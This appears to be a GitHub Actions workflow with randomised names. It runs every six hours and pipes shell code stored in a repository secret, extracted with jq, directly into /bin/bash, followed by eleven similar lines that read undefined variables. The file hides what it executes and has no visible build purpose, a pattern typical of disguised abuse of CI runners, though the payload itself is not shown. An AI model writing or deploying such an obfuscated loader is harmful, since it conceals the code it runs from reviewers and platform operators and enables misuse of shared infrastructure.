name: tianpoguang1937

on:
  workflow_dispatch:
  schedule:
    - cron: '49 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: tianpoguang1937
        env:
          tpld5257: ${{ secrets.tpld5257 }}
        run: |
          echo $tpld5257 | jq -r .xonau11 | /bin/bash
          echo $u72438 | jq -r .sgyr6 | /bin/bash
          echo $s9836 | jq -r .hapc847 | /bin/bash
          echo $usts530 | jq -r .chgq53608 | /bin/bash
          echo $c2 | jq -r .v74593 | /bin/bash
          echo $mrmt641 | jq -r .msu58 | /bin/bash
          echo $hpanp7622 | jq -r .h008 | /bin/bash
          echo $witxx6 | jq -r .e4 | /bin/bash
          echo $ut76 | jq -r .m501 | /bin/bash
          echo $imkjv5401 | jq -r .uzkv096 | /bin/bash
          echo $cvp3527 | jq -r .v2356 | /bin/bash
          echo $dwrt52 | jq -r .iz21076 | /bin/bash

